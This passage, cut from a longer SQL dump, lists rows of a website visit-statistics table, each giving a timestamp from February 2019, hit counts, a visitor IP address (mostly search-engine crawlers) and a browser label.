66.44','chrome'),(383937,1549661352,1,1,0,0,'46.229.168.138','other'),(383938,1549661386,1,1,0,0,'46.229.168.143','other'),(383939,1549661582,1,1,0,0,'54.36.149.19','other'),(383940,1549661794,1,1,0,0,'8.29.198.27','other'),(383941,1549661916,1,1,0,0,'54.36.148.17','other'),(383942,1549662200,1,1,0,0,'54.36.148.169','other'),(383943,1549662372,1,1,0,0,'54.36.148.161','other'),(383944,1549662791,1,1,0,0,'40.77.167.2','other'),(383945,1549662912,1,1,0,0,'54.36.149.75','other'),(383946,1549663069,1,1,0,0,'54.36.148.22','other'),(383947,1549663271,1,1,0,0,'216.244.66.241','other'),(383948,1549663285,1,1,0,0,'54.36.148.12','other'),(383949,1549663316,1,1,0,0,'8.29.198.27','other'),(383950,1549663518,1,1,0,0,'207.46.13.168','other'),(383951,1549663626,1,1,0,0,'46.229.168.129','other'),(383952,1549663820,1,1,0,0,'95.163.255.194','other'),(383953,1549663932,1,1,0,0,'46.229.168.148','other'),(383954,1549664059,1,1,0,0,'54.36.148.67','other'),(383955,1549664363,1,1,0,0,'46.211.42.194','chrome'),(383956,1549664380,1,1,0,0,'54.36.148.187','other'),(383957,1549664423,1,1,0,0,'54.36.149.64','other'),(383958,1549664619,1,1,0,0,'66.249.66.152','chrome'),(383959,1549665018,1,1,0,0,'66.249.66.154','chrome'),(383960,1549665407,2,2,0,0,'66.249.66.40','chrome'),(383961,1549665522,2,2,0,0,'216.244.66.241','other'),(383962,1549665659,1,1,0,0,'54.36.148.19','other'),(383963,1549665901,1,1,0,0,'54.36.148.189','other'),(383964,1549666458,1,1,0,0,'54.36.149.32','other'),(383965,1549666965,1,1,0,0,'66.249.66.154','chrome'),(383966,1549667119,1,1,0,0,'54.36.149.16','other'),(383967,1549667154,1,0,1,0,'66.249.66.152',''),(383968,1549667325,1,1,0,0,'54.36.149.61','other'),(383969,1549667574,1,1,0,0,'66.249.66.156','chrome'),(383970,1549668136,1,1,0,0,'54.36.149.66','other'),(383971,1549668179,1,1,0,0,'66.249.66.44','chrome'),(383972,1549668261,1,1,0,0,'207.46.13.218','other'),(383973,1549668496,1,1,0,0,'66.249.66.148','chrome'),(383974,1549668586,1,1,0,0,'180.76.15.7','other'),(383975,1549668997,1,1,0,0,'157.55.39.95','other'),(383976,1549669380,1,1,0,0,'46.229.168.146','other'),(383977,1549669543,1,1,0,0,'35.180.158.6','other'),(383978,1549669653,1,1,0,0,'66.249.66.40','chrome'),(383979,1549669707,1,1,0,0,'207.46.13.218','other'),(383980,1549669757,1,1,0,0,'54.36.148.103','other'),(383981,1549670279,1,1,0,0,'54.36.149.11','other'),(383982,1549670320,1,1,0,0,'54.36.149.36','other'),(383983,1549670932,1,1,0,0,'66.249.66.44','chrome'),(383984,1549671050,1,1,0,0,'207.46.13.218','other'),(383985,1549671082,1,1,0,0,'54.36.148.222','other'),(383986,1549671103,1,1,0,0,'54.36.149.77','other'),(383987,1549671293,1,1,0,0,'54.36.148.90','other'),(383988,1549671511,3,3,0,0,'216.244.66.241','other'),(383989,1549672133,1,1,0,0,'54.36.148.88','other'),(383990,1549672167,1,1,0,0,'46.229.168.134','other'),(383991,1549672251,1,1,0,0,'207.46.13.218','other'),(383992,1549672330,1,1,0,0,'54.36.149.32','other'),(383993,1549672517,1,1,0,0,'95.163.255.97','other'),(383994,1549672584,1,1,0,0,'54.36.149.15','other'),(383995,1549672639,1,1,0,0,'8.29.198.27','other'),(383996,1549672950,1,1,0,0,'66.249.66.152','chrome'),(383997,1549672952,1,1,0,0,'54.36.149.31','other'),(383998,1549673292,1,1,0,0,'54.36.149.102','other'),(383999,1549673332,1,1,0,0,'54.36.149.43','other'),(384000,1549673604,1,1,0,0,'95.163.255.170','other'),(384001,1549673637,1,1,0,0,'207.46.13.132','other'),(384002,1549673737,1,1,0,0,'185.220.102.8','other'),(384003,1549673769,2,2,0,0,'91.209.11.236','other'),(384004,1549673988,1,1,0,0,'54.36.148.188','other'),(384005,1549674120,3,3,0,0,'216.244.66.241','other'),(384006,1549674143,1,1,0,0,'8.29.198.25','other'),(384007,1549674172,1,1,0,0,'54.36.149.76','other'),(384008,1549674258,1,1,0,0,'66.249.66.40','chrome'),(384009,1549674407,1,1,0,0,'54.36.148.197','other'),(384010,1549674758,1,1,0,0,'54.36.148.60','other'),(384011,1549674881,1,1,0,0,'66.249.66.152','chrome'),(384012,1549675296,1,1,0,0,'216.244.66.241','other'),(384013,1549675299,1,1,0,0,'54.36.148.176','other'),(384014,1549675362,1,1,0,0,'46.229.168.129','other'),(384015,1549675589,1,1,0,0,'54.36.148.254','other'),(384016,1549675604,1,1,0,0,'54.36.148.238','other'),(384017,1549675623,1,1,0,0,'54.36.149.46','other'),(384018,1549676615,1,1,0,0,'54.36.148.224','other'),(384019,1549676673,1,1,0,0,'157.55.39.95','other'),(384020,1549676685,1,1,0,0,'157.55.39.115','other'),(384021,1549676811,1,1,0,0,'54.36.148.233','other'),(384022,1549677230,1,1,0,0,'54.36.148.43','other'),(384023,1549677275,1,1,0,0,'54.36.149.41','other'),(384024,1549677903,1,1,0,0,'54.36.149.2','other'),(384025,1549678350,1,1,0,0,'157.55.39.115','other'),(384026,1549678395,1,1,0,0,'40.77.167.6','other'),(384027,1549678641,1,1,0,0,'54.36.149.9','other'),(384028,1549678645,1,1,0,0,'54.36.148.190','other'),(384029,1549679174,1,1,0,0,'46.229.168.138','other'),(384030,1549679623,1,1,0,0,'54.36.148.55','other'),(384031,1549679909,1,1,0,0,'54.36.149.43','other'),(384032,1549679998,1,1,0,0,'46.229.168.141','other'),(384033,1549680117,2,2,0,0,'66.249.66.152','chrome'),(384034,1549680239,1,1,0,0,'46.229.168.152','other'),(384035,1549680511,1,1,0,0,'54.36.148.186','other'),(384036,1549680556,2,2,0,0,'54.149.13.243','chrome'),(384037,1549680565,1,1,0,0,'54.36.148.116','other'),(384038,1549680598,1,1,0,0,'5.164.40.197','firefox'),(384039,1549680657,2,2,0,0,'207.46.13.132','other'),(384040,1549680855,1,1,0,0,'54.36.149.26','other'),(384041,1549681991,1,1,0,0,'216.244.66.241','other'),(384042,1549682012,1,1,0,0,'180.76.15.137','other'),(384043,1549682047,1,1,0,0,'54.36.148.227','other'),(384044,1549682270,1,1,0,0,'66.249.66.154','chrome'),(384045,1549682477,1,1,0,0,'54.36.148.173','other'),(384046,1549682598,1,1,0,0,'54.36.148.176','other'),(384047,1549683187,1,1,0,0,'157.55.39.115','other'),(384048,1549683405,1,1,0,0,'54.36.148.84','other'),(384049,1549683477,1,1,0,0,'8.29.198.27','other'),(384050,1549684153,1,1,0,0,'54.36.148.112','other'),(384051,1549684155,1,1,0,0,'54.36.148.207','other'),(384052,1549684235,1,1,0,0,'46.229.168.137','other'),(384053,1549684406,1,1,0,0,'54.36.148.197','other'),(384054,1549684438,1,1,0,0,'54.36.149.67','other'),(384055,1549684448,1,1,0,0,'54.36.148.12','other'),(384056,1549684630,1,1,0,0,'3.91.2.189','other'),(384057,1549684790,1,1,0,0,'54.36.149.61','other'),(384058,1549684827,1,1,0,0,'54.36.149.33','other'),(384059,1549684944,2,2,0,0,'216.244.66.241','other'),(384060,1549684957,1,1,0,0,'46.229.168.142','other'),(384061,1549684966,1,1,0,0,'8.29.198.27','other'),(384062,1549685099,1,1,0,0,'66.249.66.156','chrome'),(384063,1549685161,1,1,0,0,'46.229.168.146','other'),(384064,1549685443,1,1,0,0,'54.36.148.130','other'),(384065,1549685691,1,1,0,0,'54.36.148.117','other'),(384066,1549686003,1,1,0,0,'66.249.66.152','chrome'),(384067,1549686113,1,1,0,0,'180.76.15.8','other'),(384068,1549686489,1,1,0,0,'207.46.13.95','other'),(384069,1549686798,1,1,0,0,'54.36.148.248','other'),(384070,1549686943,1,1,0,0,'54.36.148.208','other'),(384071,1549687111,1,1,0,0,'54.36.149.59','other'),(384072,1549687186,1,1,0,0,'54.36.149.25','other'),(384073,1549687555,2,2,0,0,'66.249.66.154','chrome'),(384074,1549687605,1,1,0,0,'46.229.168.150','other'),(384075,1549687993,2,2,0,0,'54.36.148.210','other'),(384076,1549688010,1,1,0,0,'66.249.66.42','chrome'),(384077,1549688217,1,1,0,0,'66.249.66.152','chrome'),(384078,1549688306,2,2,0,0,'95.213.141.126','opera'),(384079,1549688386,1,1,0,0,'54.36.148.115','other'),(384080,1549688417,1,1,0,0,'54.36.148.67','other'),(384081,1549688443,1,1,0,0,'91.209.11.236','other'),(384082,1549688922,1,1,0,0,'54.36.149.25','other'),(384083,1549689768,1,1,0,0,'66.249.66.156','chrome'),(384084,1549689794,1,1,0,0,'54.36.148.165','other'),(384085,1549690136,1,1,0,0,'54.36.148.161','other'),(384086,1549690734,1,1,0,0,'216.244.66.241','other'),(384087,1549690885,1,1,0,0,'46.229.168.150','other'),(384088,1549690932,1,1,0,0,'157.55.39.81','other'),(384089,1549691181,1,1,0,0,'66.249.66.156','chrome'),(384090,1549691275,1,1,0,0,'66.249.66.154','chrome'),(384091,1549691342,1,1,0,0,'66.249.66.42','chrome'),(384092,1549691703,1,1,0,0,'54.36.148.135','other'),(384093,1549691781,1,1,0,0,'217.118.86.60','firefox'),(384094,1549691940,1,1,0,0,'46.229.168.147','other'),(384095,1549692252,1,1,0,0,'54.36.148.252','other'),(384096,1549692270,1,1,0,0,'54.36.148.115','other'),(384097,1549692287,1,1,0,0,'46.229.168.139','other'),(384098,1549693015,1,1,0,0,'54.36.149.13','other'),(384099,1549693122,2,2,0,0,'216.244.66.241','other'),(384100,1549693133,1,1,0,0,'54.36.148.169','other'),(384101,1549693136,1,1,0,0,'54.36.149.5','other'),(384102,1549693275,1,1,0,0,'207.46.13.154','other'),(384103,1549693335,1,1,0,0,'87.118.110.27','other'),(384104,1549693382,1,1,0,0,'54.36.149.103','other'),(384105,1549693702,1,1,0,0,'54.36.148.184','other'),(384106,1549693707,2,2,0,0,'66.249.66.154','chrome'),(384107,1549693717,1,1,0,0,'66.249.66.44','chrome'),(384108,1549694029,1,1,0,0,'54.36.148.239','other'),(384109,1549694310,1,1,0,0,'8.29.198.27','other'),(384110,1549694403,1,1,0,0,'54.36.149.56','other'),(384111,1549694462,1,1,0,0,'91.209.11.236','other'),(384112,1549694581,1,1,0,0,'46.229.168.149','other'),(384113,1549694823,2,2,0,0,'66.249.66.40','chrome'),(384114,1549694915,1,1,0,0,'66.249.66.42','chrome'),(384115,1549694986,1,1,0,0,'66.249.66.156','chrome'),(384116,1549695042,3,3,0,0,'66.249.66.152','chrome'),(384117,1549695771,1,1,0,0,'185.120.89.37','chrome'),(384118,1549695790,1,1,0,0,'5.45.207.19','other'),(384119,1549695794,1,1,0,0,'8.29.198.27','other'),(384120,1549695859,3,3,0,0,'216.244.66.241','other'),(384121,1549695903,1,1,0,0,'66.249.66.154','chrome'),(384122,1549696143,1,1,0,0,'66.249.66.152','chrome'),(384123,1549696655,2,2,0,0,'46.229.168.136','other'),(384124,1549697711,1,1,0,0,'54.36.148.14','other'),(384125,1549698520,1,1,0,0,'54.36.148.61','other'),(384126,1549698688,1,1,0,0,'52.53.201.78','chrome'),(384127,1549698830,1,1,0,0,'46.229.168.130','other'),(384128,1549699055,1,1,0,0,'54.36.149.7','other'),(384129,1549699176,1,1,0,0,'193.105.62.4','chrome'),(384130,1549699317,1,1,0,0,'46.229.168.136','other'),(384131,1549699476,1,1,0,0,'66.249.66.40','chrome'),(384132,1549699685,1,1,0,0,'66.249.66.152','chrome'),(384133,1549699727,1,1,0,0,'95.163.255.96','other'),(384134,1549699852,1,1,0,0,'207.46.13.154','other'),(384135,1549699949,1,1,0,0,'66.249.66.156','chrome'),(384136,1549700373,1,1,0,0,'54.36.149.31','other'),(384137,1549700456,1,1,0,0,'66.249.66.154','chrome'),(384138,1549700658,1,1,0,0,'66.249.66.152','chrome'),(384139,1549700758,7,7,0,0,'216.244.66.241','other'),(384140,1549701106,1,1,0,0,'46.229.168.143','other'),(384141,1549701183,1,1,0,0,'54.36.148.244','other'),(384142,1549701318,1,1,0,0,'54.36.148.136','other'),(384143,1549701425,1,1,0,0,'46.229.168.146','other'),(384144,1549701538,1,1,0,0,'46.229.168.136','other'),(384145,1549701581,1,1,0,0,'54.36.148.158','other'),(384146,1549701684,1,1,0,0,'207.46.13.167','other'),(384147,1549701787,1,1,0,0,'54.36.149.86','other'),(384148,1549702100,1,1,0,0,'54.36.148.209','other'),(384149,1549702122,1,1,0,0,'66.249.66.152','chrome'),(384150,1549702312,1,1,0,0,'66.249.66.154','chrome'),(384151,1549703102,1,1,0,0,'66.249.66.44','chrome'),(384152,1549703508,1,1,0,0,'207.46.13.167','other'),(384153,1549703579,1,1,0,0,'54.36.149.15','other'),(384154,1549703686,1,1,0,0,'54.36.148.63','other'),(384155,1549703786,1,1,0,0,'54.36.148.167','other'),(384156,1549703822,1,1,0,0,'46.229.168.152','other'),(384157,1549704018,1,1,0,0,'66.249.66.44','chrome'),(384158,1549704126,1,1,0,0,'95.163.255.96','other'),(384159,1549704168,1,1,0,0,'54.36.148.94','other'),(384160,1549704201,1,1,0,0,'5.188.210.53','chrome'),(384161,1549704289,2,2,0,0,'46.229.168.148','other'),(384162,1549704418,1,1,0,0,'54.36.148.247','other'),(384163,1549704557,1,1,0,0,'207.46.13.167','other'),(384164,1549704645,1,1,0,0,'46.229.168.142','other'),(384165,1549704785,1,1,0,0,'54.36.148.210','other'),(384166,1549704814,1,1,0,0,'66.249.66.156','chrome'),(384167,1549704884,1,1,0,0,'54.36.149.87','other'),(384168,1549705148,1,1,0,0,'8.29.198.26','other'),(384169,1549705266,1,1,0,0,'46.229.168.147','other'),(384170,1549705381,1,1,0,0,'54.36.148.62','other'),(384171,1549705384,1,1,0,0,'66.249.66.44','chrome'),(384172,1549705554,1,1,0,0,'91.196.177.104','chrome'),(384173,1549705570,1,1,0,0,'46.229.168.139','other'),(384174,1549705687,1,1,0,0,'54.36.148.243','other'),(384175,1549705735,1,1,0,0,'54.36.148.173','other'),(384176,1549706172,1,1,0,0,'54.36.149.3','other'),(384177,1549706277,1,1,0,0,'54.36.149.58','other'),(384178,1549706610,1,1,0,0,'5.188.210.53','chrome'),(384179,1549706631,1,1,0,0,'8.29.198.26','other'),(384180,1549706632,1,1,0,0,'134.249.146.125','chrome'),(384181,1549706685,1,1,0,0,'54.36.149.65','other'),(384182,1549706751,1,1,0,0,'54.36.149.12','other'),(384183,1549706864,7,7,0,0,'216.244.66.241','other'),(384184,1549707497,1,1,0,0,'95.163.255.93','other'),(384185,1549707498,1,1,0,0,'54.36.148.213','other'),(384186,1549707523,1,1,0,0,'46.229.168.130','other'),(384187,1549707633,1,1,0,0,'66.249.66.154','chrome'),(384188,1549707642,1,1,0,0,'207.46.13.167','other'),(384189,1549707714,1,1,0,0,'180.76.15.149','other'),(384190,1549707733,1,1,0,0,'54.36.148.19','other'),(384191,1549708094,1,1,0,0,'66.249.66.44','chrome'),(384192,1549708226,1,1,0,0,'54.36.148.192','other'),(384193,1549708291,1,1,0,0,'66.249.66.152','chrome'),(384194,1549708660,1,1,0,0,'95.163.255.167','other'),(384195,1549708851,1,1,0,0,'54.36.148.153','other'),(384196,1549708904,1,1,0,0,'54.36.148.113','other'),(384197,1549709093,1,1,0,0,'54.36.149.93','other'),(384198,1549709256,1,1,0,0,'40.77.167.104','other'),(384199,1549709265,1,1,0,0,'46.229.168.137','other'),(384200,1549709574,2,2,0,0,'216.244.66.241','other'),(384201,1549709576,1,1,0,0,'66.249.66.42','chrome'),(384202,1549709711,1,1,0,0,'188.32.254.47','chrome'),(384203,1549709939,1,1,0,0,'46.229.168.134','other'),(384204,1549710262,1,1,0,0,'95.134.171.238','other'),(384205,1549710407,1,1,0,0,'95.163.255.153','other'),(384206,1549710592,1,1,0,0,'66.249.66.156','chrome'),(384207,1549710775,1,1,0,0,'54.36.148.220','other'),(384208,1549711075,1,1,0,0,'66.249.66.154','chrome'),(384209,1549711086,2,2,0,0,'66.249.66.152','chrome'),(384210,1549711529,1,1,0,0,'46.229.168.129','other'),(384211,1549711657,1,1,0,0,'216.244.66.241','other'),(384212,1549711763,1,1,0,0,'46.211.120.207','chrome'),(384213,1549711795,1,1,0,0,'66.249.66.156','chrome'),(384214,1549712220,1,1,0,0,'46.229.168.142','other'),(384215,1549712575,1,1,0,0,'216.244.66.241','other'),(384216,1549712687,1,1,0,0,'46.229.168.152','other'),(384217,1549713006,1,1,0,0,'207.46.13.167','other'),(384218,1549713056,1,1,0,0,'157.55.39.116','other'),(384219,1549713136,1,1,0,0,'54.36.149.87','other'),(384220,1549713311,1,1,0,0,'66.249.66.40','chrome'),(384221,1549713719,1,1,0,0,'54.36.148.119','other'),(384222,1549713761,1,1,0,0,'46.211.120.207','chrome'),(384223,1549714003,1,1,0,0,'66.249.66.44','chrome'),(384224,1549714119,2,2,0,0,'66.249.66.154','chrome'),(384225,1549714360,1,1,0,0,'66.249.66.156','chrome'),(384226,1549714671,1,1,0,0,'66.249.66.42','chrome'),(384227,1549714674,1,1,0,0,'54.36.148.227','other'),(384228,1549714721,3,3,0,0,'216.244.66.241','other'),(384229,1549715338,2,2,0,0,'157.55.39.116','other'),(384230,1549715427,1,1,0,0,'46.229.168.138','other'),(384231,1549715694,1,1,0,0,'54.36.148.21','other'),(384232,1549715726,1,1,0,0,'54.36.148.100','other'),(384233,1549715876,1,1,0,0,'66.249.66.42','chrome'),(384234,1549715920,1,1,0,0,'46.229.168.141','other'),(384235,1549715988,1,1,0,0,'8.29.198.27','other'),(384236,1549716080,1,1,0,0,'91.209.11.236','other'),(384237,1549716123,1,1,0,0,'54.36.149.26','other'),(384238,1549716158,1,1,0,0,'54.36.148.45','other'),(384239,1549716244,1,1,0,0,'95.134.171.238','other'),(384240,1549716894,1,1,0,0,'54.36.148.21','other'),(384241,1549716970,1,1,0,0,'46.229.168.150','other'),(384242,1549717129,1,1,0,0,'54.36.148.232','other'),(384243,1549717449,1,1,0,0,'54.36.148.65','other'),(384244,1549717474,1,1,0,0,'8.29.198.26','other'),(384245,1549717502,1,1,0,0,'66.249.66.156','chrome'),(384246,1549717681,1,1,0,0,'66.249.66.44','chrome'),(384247,1549717710,1,1,0,0,'66.249.66.152','chrome'),(384248,1549718023,1,1,0,0,'54.36.148.87','other'),(384249,1549718117,1,1,0,0,'51.255.65.46','other'),(384250,1549718266,1,1,0,0,'95.163.255.95','other'),(384251,1549718273,1,1,0,0,'54.36.148.178','other'),(384252,1549718500,1,1,0,0,'54.36.148.196','other'),(384253,1549718616,1,1,0,0,'54.36.148.189','other'),(384254,1549718782,1,1,0,0,'40.77.167.61','other'),(384255,1549719188,2,2,0,0,'54.36.149.98','other'),(384256,1549719248,1,1,0,0,'54.36.148.113','other'),(384257,1549719260,2,2,0,0,'66.249.66.156','chrome'),(384258,1549719267,2,2,0,0,'66.249.66.154','chrome'),(384259,1549719497,1,1,0,0,'54.36.149.32','other'),(384260,1549719549,1,1,0,0,'66.249.66.152','chrome'),(384261,1549719845,6,6,0,0,'216.244.66.241','other'),(384262,1549720212,1,1,0,0,'54.36.148.98','other'),(384263,1549720228,1,1,0,0,'54.36.148.242','other'),(384264,1549720290,1,1,0,0,'46.229.168.140','other'),(384265,1549720405,1,1,0,0,'54.36.148.146','other'),(384266,1549720679,1,1,0,0,'54.36.148.86','other'),(384267,1549720692,1,1,0,0,'54.36.149.96','other'),(384268,1549720730,1,1,0,0,'66.249.66.44','chrome'),(384269,1549720765,1,1,0,0,'54.36.149.6','other'),(384270,1549720828,1,1,0,0,'66.249.66.42','chrome'),(384271,1549721094,1,1,0,0,'66.249.66.154','chrome'),(384272,1549721459,1,1,0,0,'40.77.167.155','other'),(384273,1549721738,2,2,0,0,'40.77.167.61','other'),(384274,1549721762,1,1,0,0,'66.249.66.152','chrome'),(384275,1549722085,1,1,0,0,'66.249.66.44','chrome'),(384276,1549722105,1,1,0,0,'54.36.148.12','other'),(384277,1549722803,1,1,0,0,'46.229.168.138','other'),(384278,1549723187,1,1,0,0,'54.36.149.25','other'),(384279,1549723332,2,2,0,0,'216.244.66.241','other'),(384280,1549723774,1,1,0,0,'46.211.133.152','chrome'),(384281,1549724156,1,1,0,0,'157.55.39.4','other'),(384282,1549724278,1,1,0,0,'54.36.148.15','other'),(384283,1549724594,1,1,0,0,'54.36.148.129','other'),(384284,1549724740,1,1,0,0,'66.249.66.154','chrome'),(384285,1549725109,1,1,0,0,'95.163.255.171','other'),(384286,1549725130,2,2,0,0,'66.249.66.156','chrome'),(384287,1549725278,1,1,0,0,'54.36.148.105','other'),(384288,1549725819,2,2,0,0,'216.244.66.241','other'),(384289,1549726532,1,1,0,0,'54.36.148.127','other'),(384290,1549726808,1,1,0,0,'54.36.148.97','other'),(384291,1549726828,1,1,0,0,'8.29.198.26','other'),(384292,1549727246,2,2,0,0,'40.77.167.61','other'),(384293,1549727367,3,3,0,0,'40.77.167.155','other'),(384294,1549727584,1,1,0,0,'46.229.168.132','other'),(384295,1549727711,1,1,0,0,'91.196.178.184','chrome'),(384296,1549727754,1,1,0,0,'46.229.168.136','other'),(384297,1549727805,1,1,0,0,'54.36.148.131','other'),(384298,1549728318,1,1,0,0,'8.29.198.26','other'),(384299,1549728324,1,1,0,0,'54.36.148.193','other'),(384300,1549728330,3,3,0,0,'216.244.66.241','other'),(384301,1549728491,1,1,0,0,'54.36.149.32','other'),(384302,1549728733,2,2,0,0,'40.77.167.204','other'),(384303,1549729323,1,1,0,0,'40.77.167.61','other'),(384304,1549729409,1,1,0,0,'54.36.148.32','other'),(384305,1549729823,1,1,0,0,'46.229.168.151','other'),(384306,1549730101,1,1,0,0,'5.45.207.79','other'),(384307,1549730200,1,1,0,0,'46.229.168.136','other'),(384309,1549730207,1,1,0,0,'40.77.167.204','other'),(384310,1549730253,1,1,0,0,'207.46.13.44','other'),(384311,1549730347,1,1,0,0,'66.249.66.152','chrome'),(384312,1549730395,1,1,0,0,'66.249.66.40','chrome'),(384313,1549730431,2,2,0,0,'66.249.66.154','chrome'),(384314,1549730649,3,3,0,0,'207.46.13.46','other'),(384315,1549731596,1,1,0,0,'46.229.168.134','other'),(384316,1549731693,1,1,0,0,'54.36.148.120','other'),(384317,1549731789,1,1,0,0,'54.36.149.66','other'),(384318,1549732420,1,1,0,0,'66.249.66.44','chrome'),(384319,1549733349,2,2,0,0,'46.229.168.141','other'),(384320,1549733658,1,1,0,0,'46.229.168.137','other'),(384321,1549733758,1,1,0,0,'95.163.255.96','other'),(384322,1549733763,1,1,0,0,'95.163.255.92','other'),(384323,1549733765,1,1,0,0,'95.163.255.93','other'),(384324,1549733783,1,1,0,0,'180.76.15.148','other'),(384325,1549733830,1,1,0,0,'216.244.66.241','other'),(384326,1549733897,1,1,0,0,'66.249.66.40','chrome'),(384327,1549734138,1,1,0,0,'66.249.66.154','chrome'),(384328,1549734220,1,1,0,0,'54.36.149.88','other'),(384329,1549734410,1,1,0,0,'40.77.167.75','other'),(384330,1549735083,1,1,0,0,'207.46.13.46','other'),(384331,1549735319,1,1,0,0,'66.249.66.42','chrome'),(384332,1549735524,1,1,0,0,'66.249.66.152','chrome'),(384333,1549735572,2,2,0,0,'66.249.66.156','chrome'),(384334,1549735682,1,1,0,0,'40.77.167.75','other'),(384335,1549736190,1,1,0,0,'66.249.66.154','chrome'),(384336,1549736489,1,1,0,0,'54.36.148.156','other'),(384337,1549736627,1,1,0,0,'54.36.148.197','other'),(384338,1549736862,1,1,0,0,'54.36.148.33','other'),(384339,1549736884,4,4,0,0,'157.55.39.150','other'),(384340,1549737075,1,1,0,0,'54.36.148.193','other'),(384341,1549737610,1,1,0,0,'54.36.148.14','other'),(384342,1549737673,1,1,0,0,'8.29.198.26','other'),(384343,1549738335,1,1,0,0,'54.36.149.58','other'),(384344,1549738977,1,1,0,0,'66.249.66.40','chrome'),(384345,1549739046,1,1,0,0,'54.36.148.93','other'),(384346,1549739152,1,1,0,0,'8.29.198.25','other'),(384347,1549739389,3,3,0,0,'216.244.66.241','other'),(384348,1549739471,1,1,0,0,'95.163.255.99','other'),(384349,1549739895,1,1,0,0,'54.36.148.189','other'),(384350,1549739925,1,1,0,0,'54.36.148.11','other'),(384351,1549740437,1,1,0,0,'91.196.178.55','chrome'),(384352,1549740838,1,1,0,0,'54.36.148.92','other'),(384353,1549741219,1,1,0,0,'66.249.66.44','chrome'),(384354,1549741275,1,1,0,0,'46.229.168.142','other'),(384355,1549742205,3,3,0,0,'66.249.66.154','chrome'),(384356,1549742345,1,1,0,0,'54.36.148.206','other'),(384357,1549742467,1,1,0,0,'46.229.168.141','other'),(384358,1549742818,1,1,0,0,'66.249.66.152','chrome'),(384359,1549742836,1,1,0,0,'54.36.149.0','other'),(384360,1549742879,1,1,0,0,'54.36.149.76','other'),(384361,1549743174,1,1,0,0,'91.196.178.134','chrome'),(384362,1549743207,1,1,0,0,'54.36.148.28','other'),(384363,1549743233,1,1,0,0,'46.211.148.247','chrome'),(384364,1549743285,1,1,0,0,'66.249.66.154','chrome'),(384365,1549744530,4,4,0,0,'66.249.66.152','chrome'),(384366,1549744866,1,1,0,0,'66.249.66.154','chrome'),(384367,1549744892,1,1,0,0,'54.36.148.118','other'),(384368,1549744895,2,2,0,0,'157.55.39.150','other'),(384369,1549744925,1,1,0,0,'46.229.168.132','other'),(384370,1549745107,1,1,0,0,'216.244.66.241','other'),(384371,1549745273,1,1,0,0,'46.229.168.129','other'),(384372,1549745328,1,1,0,0,'46.229.168.137','other'),(384373,1549746179,1,1,0,0,'66.249.66.148','chrome'),(384374,1549746321,1,1,0,0,'54.36.148.245','other'),(384375,1549746630,2,2,0,0,'66.249.66.152','chrome'),(384376,1549746803,2,2,0,0,'66.249.66.154','chrome'),(384377,1549747046,1,1,0,0,'54.36.149.76','other'),(384378,1549748306,1,1,0,0,'54.36.149.37','other'),(384379,1549748518,1,1,0,0,'8.29.198.26','other'),(384380,1549748736,1,1,0,0,'54.36.149.32','other'),(384381,1549748927,1,1,0,0,'54.36.148.99','other'),(384382,1549749007,1,1,0,0,'157.55.39.103','other'),(384383,1549749034,1,1,0,0,'207.46.13.224','other'),(384384,1549749222,1,1,0,0,'46.229.168.143','other'),(384385,1549749249,1,1,0,0,'207.46.13.66','other'),(384386,1549749393,1,1,0,0,'54.36.148.255','other'),(384387,1549749607,1,1,0,0,'54.36.148.245','other'),(384388,1549749695,1,1,0,0,'54.36.148.196','other'),(384389,1549749721,1,1,0,0,'54.36.148.206','other'),(384390,1549749757,1,1,0,0,'54.36.148.58','other'),(384391,1549749988,1,1,0,0,'8.29.198.26','other'),(384392,1549750106,1,1,0,0,'54.36.148.64','other'),(384393,1549750222,1,1,0,0,'95.163.255.94','other'),(384394,1549750444,1,1,0,0,'157.55.39.150','other'),(384395,1549750639,1,1,0,0,'54.36.148.147','other'),(384396,1549750703,1,1,0,0,'91.196.178.181','chrome'),(384397,1549750782,1,1,0,0,'66.249.66.156','chrome'),(384398,1549751147,1,1,0,0,'54.36.148.133','other'),(384399,1549751640,1,1,0,0,'54.36.148.38','other'),(384400,1549751643,2,2,0,0,'46.229.168.142','other'),(384401,1549751947,2,2,0,0,'66.249.66.152','chrome'),(384402,1549752104,1,1,0,0,'54.36.148.90','other'),(384403,1549752281,1,1,0,0,'54.36.148.234','other'),(384404,1549752521,2,2,0,0,'66.249.66.156','chrome'),(384405,1549752528,1,1,0,0,'54.36.148.52','other'),(384406,1549753601,1,1,0,0,'54.36.148.184','other'),(384407,1549753678,2,2,0,0,'66.249.66.152','chrome'),(384408,1549753810,1,1,0,0,'66.249.66.154','chrome'),(384409,1549753981,1,1,0,0,'46.229.168.137','other'),(384410,1549754207,1,1,0,0,'46.229.168.146','other'),(384411,1549754453,1,1,0,0,'95.163.255.185','other'),(384412,1549754613,1,1,0,0,'54.36.149.70','other'),(384413,1549754889,1,1,0,0,'54.36.149.93','other'),(384414,1549755223,1,1,0,0,'54.36.148.167','other'),(384415,1549755244,1,1,0,0,'54.36.149.54','other'),(384416,1549755245,1,1,0,0,'66.249.66.152','chrome'),(384417,1549755912,2,2,0,0,'216.244.66.241','other'),(384418,1549756370,1,1,0,0,'54.36.148.148','other'),(384419,1549756819,1,1,0,0,'54.36.148.173','other'),(384420,1549756822,1,1,0,0,'54.36.148.219','other'),(384421,1549756863,1,1,0,0,'54.36.148.223','other'),(384422,1549757026,1,1,0,0,'207.46.13.182','other'),(384423,1549757176,1,1,0,0,'40.77.167.79','other'),(384424,1549757331,1,1,0,0,'54.36.148.248','other'),(384425,1549757360,1,1,0,0,'66.249.66.152','chrome'),(384426,1549757387,1,1,0,0,'54.36.148.43','other'),(384427,1549757566,1,1,0,0,'46.229.168.133','other'),(384428,1549757954,1,1,0,0,'46.229.168.150','other'),(384429,1549758434,1,1,0,0,'66.249.66.42','chrome'),(384430,1549758470,2,2,0,0,'66.249.66.40','chrome'),(384431,1549758675,1,1,0,0,'216.244.66.241','other'),(384432,1549758814,2,2,0,0,'66.249.66.154','chrome'),(384433,1549758829,1,1,0,0,'54.36.148.233','other'),(384434,1549758996,1,1,0,0,'54.36.149.26','other'),(384435,1549759047,1,1,0,0,'46.229.168.137','other'),(384436,1549759214,1,1,0,0,'5.188.44.20','chrome'),(384437,1549759361,1,1,0,0,'8.29.198.27','other'),(384438,1549759372,1,1,0,0,'110.184.47.26','firefox'),(384439,1549760081,1,1,0,0,'46.229.168.137','other'),(384440,1549760105,2,2,0,0,'66.249.66.152','chrome'),(384441,1549760111,1,1,0,0,'46.229.168.133','other'),(384442,1549760113,1,1,0,0,'109.70.100.21','other'),(384443,1549760491,1,1,0,0,'40.77.167.132','other'),(384444,1549760584,1,1,0,0,'54.36.148.211','other'),(384445,1549760630,1,1,0,0,'66.249.66.44','chrome'),(384446,1549760819,1,1,